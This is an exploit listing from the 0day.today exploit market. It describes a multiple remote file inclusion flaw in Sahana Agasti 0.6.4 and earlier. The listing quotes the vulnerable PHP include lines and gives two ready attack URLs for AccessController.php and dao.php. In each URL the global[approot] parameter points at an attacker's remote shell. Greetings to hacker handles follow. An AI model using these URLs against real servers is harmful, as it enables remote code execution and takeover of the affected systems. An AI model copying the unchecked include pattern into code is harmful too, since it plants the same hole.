[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sahana Agasti <= 0.6.4 Multiple Remote File Inclusion

Author
n0n0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15274
Category
web applications
Date add
04-01-2011
Platform
php
#Sahana Agasti <= 0.6.4 Multiple Remote File Include
#By n0n0x
#Homepage: http://priasantai.uni.cc/
#Script site: http://www.sahanafoundation.org/
#Download: https://launchpad.net/sahana-agasti/
 
#Bug:
 
25 global $global;
26 require_once($global['approot'].'inc/lib_security/lib_acl.inc');
27 require_once($global['approot'].'inc/lib_errors.inc');
 
#Vuln: sahana-phase2/mod/vm/controller/AccessController.php?global[approot]=[y0ur fuck!ng shell]
 
#Bug:
 
31 global $global;
32 require_once($global['approot'].'inc/lib_paging.inc');
 
#Vuln: sahana-phase2/mod/vm/model/dao.php?global[approot]=[y0ur fuck!ng shell]
 
****************************************************************************************************************
[!] Thanks:
   
    manadocoding.org, sekuritionline.net
****************************************************************************************************************
[!] Greetz:
    
    str0ke, angky.tatoki, EA ngel, s4va, bL4Ck_3n91n3, untouch, zreg, Valentin, team_elite
    devilbat. cr4wl3r, cyberl0g, lumut, AntiHack, DskyMC, mr.c, donyskaynet
****************************************************************************************************************



#  0day.today [2024-12-24]  #